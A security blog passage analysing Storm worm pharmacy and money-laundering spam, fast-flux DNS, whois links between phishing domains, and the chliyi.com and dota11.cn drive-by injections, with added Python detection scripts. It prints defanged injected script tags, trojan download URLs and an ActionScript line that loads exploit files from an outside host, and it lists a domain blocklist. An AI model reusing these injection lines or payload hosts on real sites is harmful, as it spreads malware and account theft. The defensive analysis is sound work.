One really cool discovery concerning these name servers is that they seem to be riding a fast flux network too: a ttl of 180 seconds is seen at first, but when that initial ttl expires a new ttl of 172800 is seen and the A record changes to a new IP address. Very odd stuff, so I dug into the VIPSAM.COM domain and found it no longer resolves, but was used back in July to point to another online pharmaceutical site titled “Online Pharmacy”. This seems to be another very active and large pharmaceutical spam participant, with 70 other domain names currently resolving to this host and at least 63 other hosts sharing its name servers. Here is a screen shot of this pharmaceutical company website to give you an idea of what it currently looks like:

As you can tell this was all very odd to me, and it was actually the first time I was led to an online pharmaceutical spam site from a money laundering phishing site. I can’t say the two are owned and operated by the same person or organization; they are only linked by name servers and shared hosting. I will let you be the judge of that.

Now getting back to the vik-budget.com phishing forum site. Here is a screen capture of the forum post that is presented by following the link in the Storm spam message:

So as you can see it looks like a money laundering scheme in which the poster claims this to be a good and legal way of making money. I am not a lawyer or agent of the law, but this just doesn’t seem like it would be a good and legal way of making money. So I did a little digging and found this exact forum structure, including identical forum content, on other domains such as hdd-manager.com, WCA-Manager.com, xrs-capital.com, and can-budget.com. With all of the content being identical I would venture to say this is most likely a phpBB template in which the phisher simply changes the domain name and it modifies everything inside the forum to reflect this change, such as his or her email address. Looking into the whois records for these sites, all 4 domains (hdd-manager.com, wca-manager.com, xrs-capital.com, and can-budget.com) were created on March 11, 2008 with matching registrant information. Here is the whois record for wca-manager.com:

Domain Name………. WCA-Manager.com
Creation Date…….. 2008-03-11 10:22:01
Registration Date…. 2008-03-11 10:22:01
Expiry Date………. 2009-03-11 10:22:01
Organisation Name…. xiaowen
Organisation Address. No.12 chang’an road
Organisation Address.
Organisation Address. Beijing
Organisation Address. 100001
Organisation Address. BJ
Organisation Address. CN

Admin Name……….. gr wen
Admin Address…….. No.12 chang’an road
Admin Address……..
Admin Address…….. Beijing
Admin Address…….. 100001
Admin Address…….. BJ
Admin Address…….. CN
Admin Email………. 3498@34.com
Admin Phone………. +86.103093034
Admin Fax………… +86.103493934

Tech Name………… gr wen
Tech Address……… No.12 chang’an road
Tech Address………
Tech Address……… Beijing
Tech Address……… 100001
Tech Address……… BJ
Tech Address……… CN
Tech Email……….. 3498@34.com
Tech Phone……….. +86.103093034
Tech Fax…………. +86.103493934

Bill Name………… gr wen
Bill Address……… No.12 chang’an road
Bill Address………
Bill Address……… Beijing
Bill Address……… 100001
Bill Address……… BJ
Bill Address……… CN
Bill Email……….. 3498@34.com
Bill Phone……….. +86.103093034
Bill Fax…………. +86.103493934
Name Server………. ns4.nsi-centre.com
Name Server………. ns3.nsi-centre.com
Name Server………. ns2.nsi-centre.com
Name Server………. ns1.nsi-centre.com

Now the whois record for vik-budget.com wasn’t an exact match, but I am sure you can spot the similarities between the two:

Domain Name………. vik-budget.com
Creation Date…….. 2008-07-23 17:34:04
Registration Date…. 2008-07-23 17:34:04
Expiry Date………. 2009-07-23 17:34:04
Organisation Name…. xiaowen
Organisation Address. No.12 chan’an road
Organisation Address.
Organisation Address. Beijing
Organisation Address. 100001
Organisation Address. BJ
Organisation Address. CN

Admin Name……….. xiaowen
Admin Address…….. No.12 chan’an road
Admin Address……..
Admin Address…….. Beijing
Admin Address…….. 100001
Admin Address…….. BJ
Admin Address…….. CN
Admin Email………. 232@242.com
Admin Phone………. +86.102092094
Admin Fax………… +86.102482940

Tech Name………… xiaowen
Tech Address……… No.12 chan’an road
Tech Address………
Tech Address……… Beijing
Tech Address……… 100001
Tech Address……… BJ
Tech Address……… CN
Tech Email……….. 232@242.com
Tech Phone……….. +86.102092094
Tech Fax…………. +86.102482940

Bill Name………… xiaowen
Bill Address……… No.12 chan’an road
Bill Address………
Bill Address……… Beijing
Bill Address……… 100001
Bill Address……… BJ
Bill Address……… CN
Bill Email……….. 232@242.com
Bill Phone……….. +86.102092094
Bill Fax…………. +86.102482940
Name Server………. ns4.vipsam.com
Name Server………. ns3.vipsam.com
Name Server………. ns2.vipsam.com
Name Server………. ns1.vipsam.com

I also did some checking into the ICQ number, which seems to be legitimate: supplier. I didn’t try contacting this person for some social engineering, but I sure thought about it. I believe this to be the administrator or operator behind this scam, as his ICQ number is the only thing that never changes in this template. In my digging I also ran across a post at scamfraudalert.com where an administrator posted this same email template under the work-at-home scam section of their forums back in July: scamfraudalert.com posting. A little more Google magic and I was able to uncover even more information about this money laundering scam, which seems to have been around for over a year now: forum.419eater.com cs-funds and forum.419.com lvs-money.com.

The last thing I noticed in regards to the vik-budget.com domain was that it was currently being hosted on the same host as these two PhishTank-reported phishing sites: hsbc.update.citapedor.com and update.citapedor.com, which were phishing sites targeting HSBC bank back in mid July as far as I can tell. Could this be the same phisher? I will let you be the judge again by simply posting the whois record for citapedor.com:

Domain Name………. citapedor.com
Creation Date…….. 2008-07-10 20:19:29
Registration Date…. 2008-07-10 20:19:29
Expiry Date………. 2009-07-10 20:19:29
Organisation Name…. xiaowen
Organisation Address. No.12 chan’an road
Organisation Address.
Organisation Address. Beijing
Organisation Address. 100001
Organisation Address. BJ
Organisation Address. CN

Admin Name……….. xiaowen
Admin Address…….. No.12 chan’an road
Admin Address……..
Admin Address…….. Beijing
Admin Address…….. 100001
Admin Address…….. BJ
Admin Address…….. CN
Admin Email………. 232@242.com
Admin Phone………. +86.102092094
Admin Fax………… +86.102482940

Tech Name………… xiaowen
Tech Address……… No.12 chan’an road
Tech Address………
Tech Address……… Beijing
Tech Address……… 100001
Tech Address……… BJ
Tech Address……… CN
Tech Email……….. 232@242.com
Tech Phone……….. +86.102092094
Tech Fax…………. +86.102482940

Bill Name………… xiaowen
Bill Address……… No.12 chan’an road
Bill Address………
Bill Address……… Beijing
Bill Address……… 100001
Bill Address……… BJ
Bill Address……… CN
Bill Email……….. 232@242.com
Bill Phone……….. +86.102092094
Bill Fax…………. +86.102482940
Name Server………. ns2.godns1334.com
Name Server………. ns1.godns1334.com
Name Server………. ns3.godns1334.com
Name Server………. ns4.godns1334.com

So if you’re seeing what I am seeing, I would be fairly certain this is the same person or organization responsible for the past phishing attempts. I just have to wonder why they would use the same false information to register domains. If any of this really interests you I would suggest Googling these strings: “No.12 chang’an road”, “xiaowen phisher”, and “Organisation Name xiaowen”, which should give you an overall picture of just how long this phisher has been around and how many different types of phishing scams this phisher has attempted without being caught, including eBay, PayPal, Facebook, LinkedIn, and numerous financial institution phishing sites. With unique whois records being the center of my little investigation, it is almost dumbfounding to think we can’t put a stop to at least this one individual or organization.
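The registrant pivot done by hand above (shared email, phone and organisation name across wca-manager.com, vik-budget.com and citapedor.com) can be scripted so it scales past three records. The following is an added example, not code from the original post: it parses the registrar’s dotted “Key….. value” layout, normalizes the values, and links domains that share a strong indicator (email, phone, fax) or only a weak one (registrant name, full address). The sample records are trimmed copies of the three whois records quoted above; the “example-control.com” record is constructed as an unrelated control and is not real data. The field names, the strong/weak split and the normalization rule are my choices.

```python
import re
from itertools import combinations

# One line of the registrar's dotted layout, e.g. "Admin Email.......... 3498@34.com";
# the filler may be ASCII dots or the "…" the blog rendering turned them into.
_FIELD = re.compile(r"^(?P<key>[A-Za-z][A-Za-z ]*?)\s*[.\u2026]+\s*(?P<val>.*?)\s*$")

# Contact details are hard to share by accident; names and addresses are only a hint.
STRONG_FIELDS = ("Admin Email", "Tech Email", "Bill Email", "Admin Phone", "Admin Fax")
WEAK_FIELDS = ("Organisation Name", "Admin Name", "Organisation Address")

def parse_whois(text):
    """Parse dotted-key whois output into {key: [values]}, keeping repeated keys
    (address lines, name servers) in order and dropping blank ones."""
    rec = {}
    for line in text.splitlines():
        m = _FIELD.match(line.strip())
        if m and m.group("val"):
            rec.setdefault(m.group("key"), []).append(m.group("val"))
    return rec

def _norm(value):
    return re.sub(r"[^a-z0-9@.]", "", value.lower())

def _values(rec, field):
    vals = rec.get(field, [])
    if field == "Organisation Address":
        # Whole address as one string, so a shared city or country code alone is no link.
        return {_norm(" ".join(vals))} if vals else set()
    return {_norm(v) for v in vals}

def shared_fields(a, b, fields):
    """Fields whose normalized values overlap between two parsed records."""
    return {f: sorted(_values(a, f) & _values(b, f))
            for f in fields if _values(a, f) & _values(b, f)}

def link(a, b):
    """('strong' | 'weak' | None, shared_fields) for a pair of parsed records."""
    strong = shared_fields(a, b, STRONG_FIELDS)
    weak = shared_fields(a, b, WEAK_FIELDS)
    if strong:
        return "strong", {**strong, **weak}
    return ("weak", weak) if weak else (None, {})

def pivot(records):
    """records: {domain: raw whois text} -> [(d1, d2, strength, shared)] for linked pairs."""
    parsed = {d: parse_whois(t) for d, t in records.items()}
    links = []
    for d1, d2 in combinations(sorted(parsed), 2):
        strength, shared = link(parsed[d1], parsed[d2])
        if strength:
            links.append((d1, d2, strength, shared))
    return links

# Trimmed from the three whois records quoted in the post; "example-control.com"
# is a constructed, unrelated record used as a control.
SAMPLE_WHOIS = {
    "wca-manager.com": """
Organisation Name.... xiaowen
Organisation Address. No.12 chang'an road
Organisation Address. Beijing
Organisation Address. 100001
Admin Name........... gr wen
Admin Email.......... 3498@34.com
Admin Phone.......... +86.103093034
""",
    "vik-budget.com": """
Organisation Name.... xiaowen
Organisation Address. No.12 chan'an road
Organisation Address. Beijing
Organisation Address. 100001
Admin Name........... xiaowen
Admin Email.......... 232@242.com
Admin Phone.......... +86.102092094
""",
    "citapedor.com": """
Organisation Name.... xiaowen
Organisation Address. No.12 chan'an road
Organisation Address. Beijing
Organisation Address. 100001
Admin Name........... xiaowen
Admin Email.......... 232@242.com
Admin Phone.......... +86.102092094
""",
    "example-control.com": """
Organisation Name.... Example Hosting
Organisation Address. 1 Example Way
Organisation Address. Anytown
Organisation Address. 00000
Admin Name........... Jane Doe
Admin Email.......... hostmaster@example.net
Admin Phone.......... +1.5555550100
""",
}

if __name__ == "__main__":
    for d1, d2, strength, shared in pivot(SAMPLE_WHOIS):
        print(f"{d1} <-> {d2}: {strength} {sorted(shared)}")
```

Run as-is it reports vik-budget.com and citapedor.com as a strong link (same email and phone), both of them as weak links to wca-manager.com (organisation name only; the “chang’an” versus “chan’an” typo keeps the address from matching), and nothing for the control record. A weak link on its own is a lead to chase, not proof of common ownership, which matches the caution in the text.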

The only other spam I saw coming out of the Storm worm was the normal Pharmacy Express and Canadian Pharmacy stuff. I have noticed the Canadian Pharmacy spam is riding a slightly more complex fast flux network and makes up about 75% of all the spam coming from Storm Worm infected hosts. Here is a list of the domain names I captured during this analysis:

  • areatry.com
  • boardcow.com
  • boughttool.com
  • claimtie.com
  • drawbe.com
  • groupyellow.com
  • pitchinclude.com
  • presentalso.com
  • probablewide.com
  • whetherthus.com

Here is a sample dig query against one of the domains “areatry.com”:

;; ANSWER SECTION:
areatry.com. 120 IN A 89.139.42.151
areatry.com. 120 IN A 89.142.143.19
areatry.com. 120 IN A 89.169.184.21
areatry.com. 120 IN A 91.66.127.14
areatry.com. 120 IN A 118.168.25.176
areatry.com. 120 IN A 210.194.144.198
areatry.com. 120 IN A 213.211.44.132
areatry.com. 120 IN A 218.171.174.108
areatry.com. 120 IN A 218.190.85.230
areatry.com. 120 IN A 59.188.130.110
areatry.com. 120 IN A 61.224.205.217
areatry.com. 120 IN A 69.66.219.190
areatry.com. 120 IN A 75.139.130.32
areatry.com. 120 IN A 77.41.88.195
areatry.com. 120 IN A 77.127.162.69
areatry.com. 120 IN A 79.164.122.160
areatry.com. 120 IN A 79.172.80.138
areatry.com. 120 IN A 85.250.12.186
areatry.com. 120 IN A 85.250.27.81
areatry.com. 120 IN A 89.110.48.125

;; AUTHORITY SECTION:
areatry.com. 163448 IN NS ns1.er909erede.com.
areatry.com. 163448 IN NS ns1.ijekrii9.com.
areatry.com. 163448 IN NS ns0.er909erede.com.
areatry.com. 163448 IN NS ns0.ijekrii9.com.

As you can clearly see the ttl is 120 seconds and 20 A records are served up for each look up. This is definitely more complex than the Pharmacy Express spam.

The pharmacy express spam domains I discovered during this run were:

  • denvermedicaldoc.sg
  • doctordoctorlist.sg
  • funmedicaldoctor.sg
  • medicaldoc.sg
  • medspecialist.sg
  • medvisiondoctor.sg
  • medwaydoc.sg
  • ozmeddoc.sg
  • yourrecoverydoc.sg

These domains are also riding on a fast flux network, but only serve up one new A record every 5 minutes. Here is the output of my dig command for the “ozmeddoc.sg” domain:

;; ANSWER SECTION:
ozmeddoc.sg. 590 IN A 204.95.101.99

Don’t get the wrong idea here: I am not saying the Pharmacy Express site/domain is any less of a threat or nuisance than the Canadian Pharmacy site/domain, but the fast flux design is simpler for Pharmacy Express when compared to the Canadian Pharmacy design.
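The three fast flux judgements in this post (vik-budget.com with a 180 second ttl and a page of A records, the Canadian Pharmacy domains with a 120 second ttl and 20 A records, and the Pharmacy Express .sg domains with a single A record per ttl window) all come from reading dig output by eye. Here is an added example, not code from the original post, that turns those reads into repeatable checks: it parses dig ANSWER sections, scores each owner name on low ttl, address count and spread across networks, cross-checks the served addresses against an archive of known bot IPs, and measures churn between two successive lookups, which is the only indicator that exposes single-record flux like the .sg domains. SAMPLE_DIG is copied from the dig output quoted above; STORM_WATCHLIST is a constructed stand-in for the author’s ~180,000-address archive containing only the one address the post says matched plus a TEST-NET address that must not match. The thresholds and the use of /16 prefixes in place of ASN lookups are my assumptions.

```python
import re
from collections import defaultdict

# One dig ANSWER line "<owner>. <ttl> IN A <ipv4>"; other record types are ignored.
_A_RECORD = re.compile(
    r"^(?P<name>\S+)\s+(?P<ttl>\d+)\s+IN\s+A\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s*$"
)

def parse_a_records(dig_output):
    """Group (ttl, ip) pairs by owner name across one or more dig runs."""
    answers = defaultdict(list)
    for line in dig_output.splitlines():
        m = _A_RECORD.match(line.strip())
        if m:
            name = m.group("name").rstrip(".").lower()
            answers[name].append((int(m.group("ttl")), m.group("ip")))
    return dict(answers)

def flux_indicators(answers, short_ttl=300, min_addrs=5):
    """Single-lookup indicators (low ttl, many addresses, spread across networks)
    plus a 0..3 score. Distinct /16 prefixes stand in for ASN lookups (assumption)."""
    ttls = [ttl for ttl, _ in answers]
    ips = {ip for _, ip in answers}
    prefixes = {".".join(ip.split(".")[:2]) for ip in ips}
    ind = {
        "short_ttl": bool(ttls) and max(ttls) <= short_ttl,
        "many_addrs": len(ips) >= min_addrs,
        "diverse_nets": len(prefixes) >= min_addrs,
        "addr_count": len(ips),
    }
    ind["score"] = sum(ind[k] for k in ("short_ttl", "many_addrs", "diverse_nets"))
    return ind

def churn(previous_ips, current_ips):
    """Fraction of the current answer set not seen in the previous lookup; this is
    what exposes single-record flux like the .sg domains (one new A per ttl)."""
    current = set(current_ips)
    return len(current - set(previous_ips)) / len(current) if current else 0.0

def assess(dig_output, watchlist=()):
    """Per-owner report: indicators plus any served IPs already in a bot archive."""
    report = {}
    for name, answers in parse_a_records(dig_output).items():
        ind = flux_indicators(answers)
        ind["watchlist_hits"] = sorted({ip for _, ip in answers} & set(watchlist))
        report[name] = ind
    return report

# Copied from the dig output quoted in the post (vik-budget.com, areatry.com, ozmeddoc.sg).
SAMPLE_DIG = """
;; ANSWER SECTION:
vik-budget.com. 180 IN A 86.104.87.45
vik-budget.com. 180 IN A 89.33.209.220
vik-budget.com. 180 IN A 93.81.55.7
vik-budget.com. 180 IN A 89.112.76.91
vik-budget.com. 180 IN A 89.47.118.38
vik-budget.com. 180 IN A 91.124.247.62
vik-budget.com. 180 IN A 93.80.234.159
vik-budget.com. 180 IN A 82.179.235.165
vik-budget.com. 180 IN A 79.112.24.125
vik-budget.com. 180 IN A 190.20.206.241
vik-budget.com. 180 IN A 92.100.98.229
vik-budget.com. 180 IN A 89.45.24.174
vik-budget.com. 180 IN A 92.100.21.65
vik-budget.com. 180 IN A 89.178.231.167
vik-budget.com. 180 IN A 81.181.112.38
vik-budget.com. 180 IN A 69.144.198.226
areatry.com. 120 IN A 89.139.42.151
areatry.com. 120 IN A 89.142.143.19
areatry.com. 120 IN A 89.169.184.21
areatry.com. 120 IN A 91.66.127.14
areatry.com. 120 IN A 118.168.25.176
areatry.com. 120 IN A 210.194.144.198
areatry.com. 120 IN A 213.211.44.132
areatry.com. 120 IN A 218.171.174.108
areatry.com. 120 IN A 218.190.85.230
areatry.com. 120 IN A 59.188.130.110
areatry.com. 120 IN A 61.224.205.217
areatry.com. 120 IN A 69.66.219.190
areatry.com. 120 IN A 75.139.130.32
areatry.com. 120 IN A 77.41.88.195
areatry.com. 120 IN A 77.127.162.69
areatry.com. 120 IN A 79.164.122.160
areatry.com. 120 IN A 79.172.80.138
areatry.com. 120 IN A 85.250.12.186
areatry.com. 120 IN A 85.250.27.81
areatry.com. 120 IN A 89.110.48.125
ozmeddoc.sg. 590 IN A 204.95.101.99
"""

# Constructed stand-in for the author's archive: the one address the post says
# matched, plus a TEST-NET address that must never match.
STORM_WATCHLIST = {"69.144.198.226", "192.0.2.1"}

if __name__ == "__main__":
    for name, ind in assess(SAMPLE_DIG, STORM_WATCHLIST).items():
        print(name, ind)
```

On the quoted data vik-budget.com and areatry.com both score 3 (short ttl, 16 and 20 addresses, spread over 15 and 19 different /16s), and only vik-budget.com has a watchlist hit, which is exactly the one match the post reports. ozmeddoc.sg scores 0 on a single lookup, so for the .sg domains you have to re-query after the ttl expires and feed both answer sets to churn(); a steady 1.0 from one record to the next is the single-record flux the post describes.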

Posted in Bots and Worms, Malicious Domain, Phishing, Storm Worm | No Comments »

Malicious Site Analysis for chliyi.com injection

Posted by jeremy on 29th May 2008

According to my Google searching, chliyi.com has successfully been injected onto about 12,000 sites. This malicious domain is using the well-publicized Adobe Flash vulnerability along with a few others. The good news is Symantec ThreatCon has retracted its declaration of this being a 0-day exploit, and has since clarified with the help of Adobe that this exploit does not work on the newest version of Flash Player, version 9.0.124.0. This site is not very complex in structure, as the following site map demonstrates:

As you can see the entry point for this injection is chliyi.com/reg.js, included via the following code:

<script src=hxxp://www.chliyi.com/reg.js>

hxxp://www.chliyi.com/reg.js

This file contains no obfuscation, but does contain some interesting logic, as you can see.

Obviously if you are using the Chinese language pack you won’t receive any of the malicious code, so I would assume the authors want to avoid exploiting Chinese clients. With that I also believe that this round of injections was most likely performed by a Chinese organization.

hxxp://www.chliyi.com/img/info.htm

This page is where the obfuscation starts. It also starts the decision tree for choosing which exploits to serve to a user being directed to this malicious domain. The first obfuscation is done with VBScript and looks like this:

My first deobfuscation revealed even more VBScript obfuscation, which can be seen here:

After the second deobfuscation we see the first portion of the decision tree for choosing which exploits to send to the user’s computer. The first test tries to create an ADODB.Stream object through the control with classid clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 (RDS.DataSpace), which identifies a browser that is possibly susceptible to the MS06-014 vulnerability. If the creation is successful the user is directed to the help.htm page, and if it is unsuccessful the user is sent over to a series of exploits including the highly publicized Flash Player exploit.

hxxp://www.chliyi.com/img/help.htm

The help.htm file is obfuscated with VBScript as well, but definitely not as complicated. The obfuscated page looked like this:

Deobfuscated, it is very clear what vulnerability the authors are targeting. MS06-014 is an older vulnerability, but it must still have a very good success rate, as lots of malicious code is still targeting it. It was only last month that the famous MPack toolkit stopped including it, so, as everyone has said before me, keep your systems patched to avoid old vulnerabilities like this one being exploited on your systems.

If the exploit is successful the user will download the hxxp://www.jj120.net/inc/fuckjp.exe binary. VirusTotal detection for this is fair at 22/32 (68.75%), which can be seen here: VirusTotal Results. Running this Trojan in my lab, it grabbed two more files, FLoader.exe and WLoader.exe, which from my analysis are World of Warcraft account credential stealers. Their respective VirusTotal results can be found here: FLoader Results and WLoader.exe Results. Obviously the gaming industry offers something valuable for the site authors. Lately I have started to see a lot more of these types of Trojans, where account information for specific gaming sites is being stolen instead of the usual email and bank credentials.

hxxp://www.chliyi.com/img/flash.swf

This is obviously the Flash Player exploit that has been getting so much attention in the last few days. Most of the other sites using this exploit embed ActionScript that directs you to load different Flash files containing exploits selected for your browser. For example, most sites serve a separate Firefox file from the IE file, but this one is not as sophisticated and serves only one Flash media file. The flash decompile looks like this using swfdump:

A code extraction attempt using flare showed this:

I am fairly new at deobfuscating Flash files, but what I did notice is there is no ActionScript associated with the exploit. You can read the security bulletin posted by Adobe for more information, and if you happen to run across the toolkit or actual exploit documentation feel free to send it my way. ;) Also here are the VirusTotal results for Flash.swf.

hxxp://www.chliyi.com/img/real.htm

This is another VBScript-obfuscated page, but this time targeting the RealPlayer (CVE-2007-5601) vulnerability. This is just another example of why system administrators need to pay attention to software updates outside the normal Microsoft Windows and Microsoft Office updates published once a month. The deobfuscation process took two VBScript deobfuscations to display the actual JavaScript exploit seen here:

I didn’t include the obfuscated code snapshots as they were very large files with too many lines to take screen shots that would display properly in this post. If you need them I can send them your way or post them up for download, just ask.

hxxp://www.chliyi.com/img/new.htm

The new.htm file is another attempt at exploiting a known vulnerability in RealPlayer (CVE-2008-1309). This deobfuscation took two VBScript decodes to render the following code:

Obviously none of the exploits being served up by this malicious domain are 0-days, so if you just keep your systems up to date and exercise a little caution when surfing the internet you should be ok. One plugin I would highly recommend is NoScript for Firefox, as it will definitely aid in stopping these scripts from executing without your permission. I would also suggest filtering the domain names seen in this analysis, chliyi.com and jj120.net, at the very minimum if you have that capability. Another option would be to block the IPs associated with these domains, chliyi.com (218.30.96.87) and jj120.net (61.142.250.221); this sometimes leads to legitimate sites being blocked, as they could be on a shared host. I checked all the A and CNAME records associated with those IPs and didn’t see anything that looked legitimate or popular. I would rather block now and apologize later, but this is definitely not the corporate standard.

I also wasn’t surprised at all to see who the registrars for these two hostile domains were, as they seem to be very popular with the malware-writing community lately.

Domain Name: CHLIYI.COM
Registrar: BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN
Whois Server: whois.dns.com.cn
Referral URL: http://www.dns.com.cn
Name Server: DNS21.HICHINA.COM
Name Server: DNS22.HICHINA.COM
Status: ok
Updated Date: 24-jan-2008
Creation Date: 12-jun-2003
Expiration Date: 12-jun-2008

Domain Name: JJ120.NET
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.72DNS.COM
Name Server: NS2.72DNS.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 09-mar-2008
Creation Date: 07-mar-2006
Expiration Date: 07-mar-2009

As always if you have any questions or comments feel free to contact me or leave them here.

Posted in Malicious Domain | 1 Comment »

Malicious Site Analysis for dota11.cn injection

Posted by jeremy on 27th May 2008

SQL and XSS site injections have become a standard method for spreading malicious code and binaries lately. This is my analysis of the dota11.cn injection that just recently occurred. My goal in doing this analysis is to provide a visual picture of how these types of injections work and the methodologies behind them. First off, here is a site map for the current mappings of the dota11.cn injection:

As you can see from the site map, these types of injections serve as the gateways to a much larger schema of user tracking, malicious code, and exploit-serving web pages and/or scripts. Now let me attempt to walk you through the logic of this schema.

hxxp://www.dota11.cn/m.js

This is the entry point for this injection. The following is the actual code injected into a vulnerable web site:

<script src=hxxp://www.dota11.cn/m.js>

A simple script src= will automatically include the malicious code from the above URL, which is why it is injected into the vulnerable web site in the first place. The m.js file contains a simple JavaScript that is used to non-intrusively redirect you to a statistics gathering server. This allows the malicious designer of this schema to track users, system configurations, and traffic flows as you are involuntarily redirected through this maze of hostile content. The statistics gathering server is located at web.51.la/go.asp. The other portion of the m.js file contains simple logic to render one of two iframe redirections based on your browser’s language settings. If you have the Chinese language pack configured you will be directed to windows.loveyoushipin.com/ing/le.htm, and if you don’t have it configured you will be directed to www.dota11.cn/dj.htm. The last and final portion of the m.js script will direct you via an iframe to www.woai117.cn/123.htm. You can view the original m.js source code here in PDF format: M.js Source Code.
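Both the chliyi.com and the dota11.cn injections start the same way: a one-line <script src=…> pointing at an off-site host, followed by hidden iframes and a language check that decides who gets the exploit pages. Here is an added example, not code from either post, of how to triage a fetched page for that pattern: it collects every script and iframe src, flags those on a host other than the page’s own, matches them against the domains named in these two analyses, and reports inline scripts that branch on the browser language. SAMPLE_HTML is a constructed victim page; the injected tag is the one quoted in the chliyi.com post and the hidden iframe mirrors the dota11.cn chain, while cdn.example.net is made up to show an off-site but non-blocklisted reference. The navigator property names checked for the language gate are an assumption, since the posts describe the gate but never show how it was written.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts named in the chliyi.com and dota11.cn analyses (subdomains match too).
BLOCKLIST = {"chliyi.com", "jj120.net", "dota11.cn", "woai117.cn", "loveyoushipin.com", "51.la"}

# Assumption: a language gate in an injected script reads one of these navigator
# properties; the posts describe the gate but do not show how it was written.
_LANG_GATE = re.compile(r"navigator\.(?:systemLanguage|userLanguage|browserLanguage|language)\b")

def host_of(url):
    """Hostname of a URL, undoing the hxxp:// defanging used in the write-ups."""
    refanged = re.sub(r"^hxxp(s?)://", r"http\1://", url.strip(), flags=re.I)
    return (urlparse(refanged).hostname or "").lower()

def in_blocklist(host):
    return any(host == d or host.endswith("." + d) for d in BLOCKLIST)

class _RefCollector(HTMLParser):
    """Collect script/iframe src attributes and the bodies of inline scripts."""
    def __init__(self):
        super().__init__()
        self.refs, self.inline, self._in_inline = [], [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "iframe") and a.get("src"):
            self.refs.append((tag, a["src"]))
        if tag == "script":
            self._in_inline = not a.get("src")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline = False

    def handle_data(self, data):
        if self._in_inline and data.strip():
            self.inline.append(data.strip())

def scan(html, page_url):
    """Return (kind, tag, detail) findings: blocklisted or off-site script/iframe
    sources, and inline scripts that branch on the browser language."""
    own = host_of(page_url)
    p = _RefCollector()
    p.feed(html)
    findings = []
    for tag, src in p.refs:
        h = host_of(src)
        if not h:
            continue  # relative URL: same origin, nothing to flag
        if in_blocklist(h):
            findings.append(("blocklisted", tag, src))
        elif h != own:
            findings.append(("external", tag, src))
    for body in p.inline:
        if _LANG_GATE.search(body):
            findings.append(("language_gate", "script", body[:60]))
    return findings

# Constructed victim page: the injected tag is the one quoted in the chliyi.com post,
# the hidden iframe mirrors the dota11.cn chain, and cdn.example.net is made up.
SAMPLE_HTML = """<html><head><title>Victim page</title>
<script src=hxxp://www.chliyi.com/reg.js></script>
<script src="/js/site.js"></script>
<script>
if (navigator.systemLanguage.toLowerCase().indexOf("zh") == -1) {
  document.write("<iframe src=hxxp://www.dota11.cn/dj.htm width=0 height=0></iframe>");
}
</script>
</head><body>
<iframe src="hxxp://www.woai117.cn/123.htm" width="0" height="0"></iframe>
<script src="https://cdn.example.net/lib.js"></script>
</body></html>"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_HTML, "http://victim.example/index.html"):
        print(*finding)
```

Anything reported as "external" still needs a human look; third-party script hosts are normal on legitimate pages, which is exactly why the blocklist and the language-gate check are separate signals rather than one verdict. Run this over a crawl of your own sites, with the blocklist extended from whatever the current injection campaign is using, and the first hit is usually the injected line.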

hxxp://windows.loveyoushipin.com/ing/le.htm

You will only receive this iframe redirection if your browser is configured to use the Chinese language pack. The le.htm file will attempt to serve a RealPlayer exploit (CVE-2007-5601) to you; more information on this vulnerability can be found here: Vulnerability Summary CVE-2007-5601. The other portion of this script will covertly redirect you to a short JavaScript at hxxp://js.users.51.la/1662569.js, which is the configuration gathering script that submits your information to the statistics gathering web server vip2.51.la/go.asp. Strategically placing these statistics gathering scripts allows the malicious site designer to track their logic flows and exploit attempts to gauge how successful his or her design is. You can view the original le.htm and 1662569.js source code here in PDF format: 1662569_js Source Code and le_htm Source Code.

hxxp://www.dota11.cn/dj.htm

You will receive this iframe redirection if your browser is not configured to use the Chinese language pack. This file appears to be the most complex piece of this malicious schema, with several logically chosen exploits being served up, and it is obfuscated to prevent detection and deter analysis. The decision tree in the decoded file goes like this:

  • The first attempt at serving malicious content targets an old vulnerability in the Microsoft Data Access Components (MDAC) function (MS06-014). If your configuration doesn’t throw an error on the creation of the ADODB.Stream object you will be iframe-redirected to hxxp://www.dota11.cn/14.htm, where the malicious binary bak.exe will be downloaded to your computer from hxxp://www.woai117.cn/bak.exe via the MDAC vulnerability being exploited.
  • If your configuration throws an error, a RealPlayer vulnerability is probed for instead. Here is the vulnerability summary information: CVE-2007-5601; it is the same vulnerability seen in the le.htm file earlier. If this probe does not throw an error you will be redirected to hxxp://www.dota11.cn/rl.htm, where an exploit for this vulnerability is attempted.
  • If the above RealPlayer probe fails and throws an error you will be iframe-redirected to hxxp://www.dota11.cn/new.htm, where you will receive another attempt at exploiting a more recent RealPlayer vulnerability (CVE-2008-1309).
  • You will also be redirected to hxxp://www.dota11.cn/04.htm, which looks like a left-behind iframe reference that the designer forgot to clean up. I say this because I received a 404 error when I tried grabbing this file.
  • The last iframe redirection occurs no matter what the above logic dictated and will lead you to hxxp://www.dota11.cn/123.htm.

Here is the source code for the files mentioned in this section: dj_htm Source Code, 14_htm Source Code, rl_htm Source Code, and new_htm Source Code. The decoded version of dj.htm can be seen here: dj_htm_decoded Source Code. VirusTotal bak.exe Results.

hxxp://www.dota11.cn/123.htm and hxxp://www.woai117.cn/123.htm

These two files, although hosted on separate domains, contain exactly the same content. Both serve up malicious Flash media files. If you are using Internet Explorer you will receive this file: hxxp://www.woai117.cn/4561.swf, and for all other browsers you will receive this one: hxxp://www.woai117.cn/4562.swf. Both utilize some embedded ActionScript logic to redirect you to a malicious Flash media file based on your Flash Player version. For Internet Explorer users the redirect looks like hxxp://www.woai117.cn/ + fVersion + i.swf, and for all others it looks like hxxp://www.woai117.cn/ + fVersion + f.swf. The following excerpt is from the ActionScript being used:

movie '4561.swf' {
  // flash 8, total frames: 1, frame rate: 12 fps, 550x400 px, compressed
  frame 1 {
    var fVersion = /:$version;
    loadMovie('hxxp://www.woai117.cn/' + fVersion + 'i.swf', _root);
    stop();
  }
}

This looks like the same set of vulnerabilities SANS.org is referencing in Adobe Flash Player Vuln and Malicious swf files.

